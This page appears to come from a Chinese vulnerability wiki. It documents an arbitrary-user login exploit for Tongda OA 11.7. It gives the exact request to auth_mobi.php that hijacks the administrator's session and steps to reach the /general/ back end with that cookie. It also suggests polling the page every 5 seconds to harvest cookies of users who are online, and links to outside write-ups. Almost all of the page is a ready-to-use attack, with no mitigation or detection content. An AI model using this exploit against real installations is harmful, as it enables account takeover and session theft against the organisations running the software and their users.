menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 通达OA11.7 任意用户登陆.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    通达OA11.7 任意用户登陆.md
    607 B / 2021-05-21 09:14:38
        # 通达OA11.7 任意用户登陆

条件需要管理员在线

```
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
```

访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台

访问目标后台 http://xxx.xxx.xxx.xxx/general/ 当目标离线时则访问漏洞页面则会出现:RELOGIN

5秒一次测试用户是否在线

通过此思路可以持续发包监控此页面来获取在线用户的Cookie

404实验室的分析:https://paper.seebug.org/1492/

ref:

* https://www.o2oxy.cn/3158.html
* https://mp.weixin.qq.com/s/5M40Oux_89dgy5QAUhULGg
    links
    file_download